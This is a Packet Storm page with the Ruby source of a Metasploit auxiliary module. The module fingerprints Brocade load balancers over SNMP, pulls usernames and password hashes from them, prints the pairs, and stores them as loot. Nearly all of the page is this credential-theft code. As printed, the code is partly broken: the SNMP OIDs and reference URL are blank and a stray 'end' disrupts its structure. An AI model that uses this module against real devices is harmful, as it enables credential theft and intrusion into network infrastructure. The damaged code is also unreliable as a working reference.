

Brocade Password Hash Enumeration

This Metasploit module extracts password hashes from certain Brocade load balancer devices.

Packet Storm
### This module requires Metasploit: Current source: MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::SNMPClient  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  def initialize    super(      'Name'        => 'Brocade Password Hash Enumeration',      'Description' => %q{        This module extracts password hashes from certain Brocade load        balancer devices.      },      'References'  =>        [          [ 'URL', '' ]        ],      'Author'      => ['Deral "PercentX" Heiland'],      'License'     => MSF_LICENSE    )  end  def run_host(ip)    begin      snmp = connect_snmp      if snmp.get_value('sysDescr.0') =~ /Brocade/        @users = []        snmp.walk("") do |row|          row.each { |val| @users << val.value.to_s }        end        @hashes = []        snmp.walk("") do |row|          row.each { |val| @hashes << val.value.to_s }        end        print_good("#{ip} - Found user and password hashes:")        end        credinfo = ""        @users.each_index do |i|        credinfo << "#{@users[i]}:#{@hashes[i]}" << "\n"        print_good("#{@users[i]}:#{@hashes[i]}")        end     #Woot we got loot.     loot_name     = "brocade.hashes"     loot_type     = "text/plain"     loot_filename = "brocade_hashes.txt"     loot_desc     = "Brodace username and password hashes"     p = store_loot(loot_name, loot_type, datastore['RHOST'], credinfo , loot_filename, loot_desc)     print_status("Credentials saved: #{p}")     rescue ::SNMP::UnsupportedVersion     rescue ::SNMP::RequestTimeout     rescue ::Interrupt       raise $!     rescue ::Exception => e       print_error("#{ip} - Error: #{e.class} #{e}")     disconnect_snmp     end  endend

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